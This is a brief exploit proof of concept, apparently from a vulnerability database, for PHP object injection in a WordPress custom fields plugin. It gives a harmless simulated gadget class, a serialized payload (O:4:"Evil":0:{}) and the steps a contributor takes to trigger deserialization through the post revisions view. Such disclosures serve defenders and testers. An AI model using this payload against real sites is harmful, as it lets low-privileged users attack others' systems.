Share
## https://sploitus.com/exploit?id=WPEX-ID:8E5EC88E-0E66-44E4-BBF2-74155D849EDE
Setup (As admin)

- To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

- Activate the plugin, access the Custom Fields Menu and create a simple Field Group

Attack (as a contributor)
- Create a new post with dummy content, fill in the plugin's text field at the bottom of the screen with O:4:"Evil":0:{}, then save the draft
- Reload the page and click "x revisions", this will trigger the PHP Object Injection